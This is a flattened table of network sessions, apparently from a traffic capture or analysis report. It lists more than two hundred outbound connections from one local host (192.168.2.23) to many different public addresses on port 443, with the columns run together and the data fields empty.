                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26842192.168.2.2335324137.74.40.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26843192.168.2.2338450164.70.208.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26844192.168.2.2354598113.61.105.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26845192.168.2.2332896110.94.42.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26846192.168.2.2349866103.74.115.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26847192.168.2.235958654.51.178.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26848192.168.2.2346640106.94.0.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26849192.168.2.2350464118.139.200.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26850192.168.2.234846452.166.245.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26851192.168.2.2342552181.69.154.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26852192.168.2.2349110120.80.243.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26853192.168.2.2343374197.49.25.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26854192.168.2.2355030218.26.172.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26855192.168.2.2341776162.143.250.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26856192.168.2.2356686114.212.163.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26857192.168.2.235612442.234.71.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26858192.168.2.2342084106.208.1.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26859192.168.2.2350410134.4.37.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26860192.168.2.2355404148.13.209.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26861192.168.2.233507477.59.219.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26862192.168.2.234857277.123.73.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26863192.168.2.2333958131.231.58.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26864192.168.2.235238063.188.254.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26865192.168.2.2341898212.105.73.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26866192.168.2.2338496193.239.22.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26867192.168.2.2345462141.129.242.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26868192.168.2.233411486.84.68.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26869192.168.2.2333980153.51.235.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26870192.168.2.235064052.80.219.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26871192.168.2.2358656191.180.206.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26872192.168.2.2346174203.78.58.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26873192.168.2.2344350133.174.20.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26874192.168.2.2348058216.240.151.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26875192.168.2.2347618152.25.52.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26876192.168.2.2339226105.119.121.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26877192.168.2.233770432.32.192.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26878192.168.2.2341930150.51.250.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26879192.168.2.235304676.200.64.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26880192.168.2.235115086.207.62.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26881192.168.2.2358430181.233.75.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26882192.168.2.233377646.152.224.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26883192.168.2.233375286.129.135.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26884192.168.2.2356110195.144.56.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26885192.168.2.234890079.35.55.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26886192.168.2.2349088172.160.178.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26887192.168.2.2339796103.99.154.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26888192.168.2.2351778129.182.108.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26889192.168.2.2357744212.67.51.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26890192.168.2.2347918196.201.206.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26891192.168.2.233939227.41.192.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26892192.168.2.235732292.18.16.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26893192.168.2.234129466.7.72.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26894192.168.2.2353578173.226.194.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26895192.168.2.234631444.112.142.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26896192.168.2.2335184140.117.33.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26897192.168.2.234663062.195.4.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26898192.168.2.2335120105.168.30.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26899192.168.2.2349634192.28.254.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26900192.168.2.2346188185.174.3.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26901192.168.2.23535461.99.82.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26902192.168.2.235890451.229.132.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26903192.168.2.2337484115.200.52.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26904192.168.2.233453086.252.70.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26905192.168.2.236061654.99.90.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26906192.168.2.2345926176.149.131.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26907192.168.2.2340260124.9.238.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26908192.168.2.235141270.147.121.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26909192.168.2.235619093.148.183.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26910192.168.2.234691476.110.48.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26911192.168.2.233364847.36.222.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26912192.168.2.2347628142.106.169.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26913192.168.2.234464479.213.167.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26914192.168.2.2343504223.30.201.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26915192.168.2.233826418.39.206.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26916192.168.2.235501290.155.22.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26917192.168.2.2342596121.127.28.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26918192.168.2.234851647.64.125.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26919192.168.2.2360664211.215.215.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26920192.168.2.2360460203.202.81.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26921192.168.2.233406673.64.212.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26922192.168.2.2334178150.200.112.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26923192.168.2.234875251.35.129.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26924192.168.2.2337954158.253.246.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26925192.168.2.235475012.90.125.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26926192.168.2.233565244.123.224.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26927192.168.2.2359154176.80.34.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26928192.168.2.23508404.75.109.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26929192.168.2.2360134213.195.184.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26930192.168.2.2340948109.51.93.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26931192.168.2.234643469.187.162.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26932192.168.2.2346438153.79.146.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26933192.168.2.236091619.96.27.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26934192.168.2.2334140133.40.178.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26935192.168.2.234628897.93.132.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26936192.168.2.2355804209.212.205.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26937192.168.2.235143870.156.218.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26938192.168.2.235672063.77.71.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26939192.168.2.235800443.188.163.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26940192.168.2.2341152177.171.134.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26941192.168.2.2336646158.209.61.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26942192.168.2.2354984166.63.60.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26943192.168.2.2359896162.89.91.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26944192.168.2.236077872.246.59.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26945192.168.2.2359154219.1.41.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26946192.168.2.2344880123.96.52.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26947192.168.2.2348566203.104.117.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26948192.168.2.2350314201.22.165.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26949192.168.2.235603078.29.39.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26950192.168.2.235484079.176.177.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26951192.168.2.233843840.169.47.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26952192.168.2.2348778175.89.218.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26953192.168.2.233465264.47.3.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26954192.168.2.2346528172.148.173.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26955192.168.2.234471852.143.152.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26956192.168.2.234251844.162.13.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26957192.168.2.2341486177.190.236.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26958192.168.2.2359476167.206.46.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26959192.168.2.233776832.221.162.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26960192.168.2.235513425.236.242.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26961192.168.2.2336490220.220.183.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26962192.168.2.2358432220.23.88.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26963192.168.2.2349732196.12.19.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26964192.168.2.2336214128.56.128.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26965192.168.2.2354932156.71.206.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26966192.168.2.2356644201.98.139.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26967192.168.2.2357240185.236.162.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26968192.168.2.2342382154.160.248.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26969192.168.2.235627034.85.213.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26970192.168.2.2360544137.76.141.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26971192.168.2.2339772172.145.28.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26972192.168.2.235765886.239.36.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26973192.168.2.2343010200.142.96.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26974192.168.2.2356304181.4.193.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26975192.168.2.2340002180.55.209.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26976192.168.2.2335448177.97.75.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26977192.168.2.2338286207.138.121.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26978192.168.2.2335140126.205.197.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26979192.168.2.233305870.104.247.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26980192.168.2.236003274.105.47.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26981192.168.2.2351782172.209.37.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26982192.168.2.2350320123.146.115.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26983192.168.2.2347998179.62.59.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26984192.168.2.2333594191.232.229.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26985192.168.2.235210235.106.229.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26986192.168.2.234010850.239.186.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26987192.168.2.236041894.100.193.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26988192.168.2.234354874.228.67.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26989192.168.2.2339262146.114.172.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26990192.168.2.2338912153.101.189.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26991192.168.2.2347564209.0.41.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26992192.168.2.2335284212.233.98.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26993192.168.2.2357116104.150.108.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26994192.168.2.235715435.23.242.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26995192.168.2.2336158218.206.251.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26996192.168.2.2335430182.197.152.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26997192.168.2.2350096161.6.238.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26998192.168.2.2342834132.161.63.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26999192.168.2.235870887.159.35.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27000192.168.2.2355032139.94.113.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27001192.168.2.2349406110.38.192.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27002192.168.2.2341420109.8.243.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27003192.168.2.236003079.141.207.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27004192.168.2.235644254.103.133.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27005192.168.2.2353336141.239.85.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27006192.168.2.233803283.132.163.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27007192.168.2.2354542146.174.79.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27008192.168.2.23506662.83.102.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27009192.168.2.2336768105.159.173.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27010192.168.2.23390125.129.234.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27011192.168.2.234922483.247.25.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27012192.168.2.234053042.149.233.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27013192.168.2.233965694.194.94.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27014192.168.2.233387858.72.31.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27015192.168.2.233278298.242.23.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27016192.168.2.2334698152.105.25.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27017192.168.2.234565036.157.203.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27018192.168.2.2337738168.228.149.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27019192.168.2.235430690.45.6.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27020192.168.2.2357036134.33.81.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27021192.168.2.2335234126.190.153.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27022192.168.2.235037443.227.193.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27023192.168.2.233729073.83.113.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27024192.168.2.2345504173.115.67.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27025192.168.2.235368034.217.167.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27026192.168.2.2360528203.106.40.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27027192.168.2.235396446.158.98.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27028192.168.2.2332870112.238.104.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27029192.168.2.2355472128.80.215.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27030192.168.2.234108040.125.19.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27031192.168.2.2333634205.147.63.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27032192.168.2.2337732135.104.90.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27033192.168.2.235633625.55.194.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27034192.168.2.235250644.23.0.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27035192.168.2.2333608121.245.190.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27036192.168.2.2341716129.27.249.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27037192.168.2.2353106133.30.105.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27038192.168.2.234231687.252.158.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27039192.168.2.2356658167.144.178.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27040192.168.2.233296647.175.33.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27041192.168.2.234011440.165.18.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27042192.168.2.2342790218.76.23.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27043192.168.2.2342364163.250.182.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27044192.168.2.233407878.141.78.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27045192.168.2.2337706142.134.66.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27046192.168.2.233402841.66.246.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27047192.168.2.233789443.84.22.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27048192.168.2.235553239.114.107.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27049192.168.2.234010674.212.112.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27050192.168.2.2354046113.136.232.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27051192.168.2.235187298.12.65.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27052192.168.2.233796018.49.217.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27053192.168.2.2347344122.196.158.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27054192.168.2.236080298.248.134.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27055192.168.2.2359230164.242.50.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27056192.168.2.2345728161.85.46.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27057192.168.2.235320218.38.170.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27058192.168.2.2355608124.213.10.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27059192.168.2.2355076173.230.94.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27060192.168.2.2347894169.164.64.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27061192.168.2.235776299.114.223.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27062192.168.2.236076674.210.215.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27063192.168.2.235151687.253.149.64443
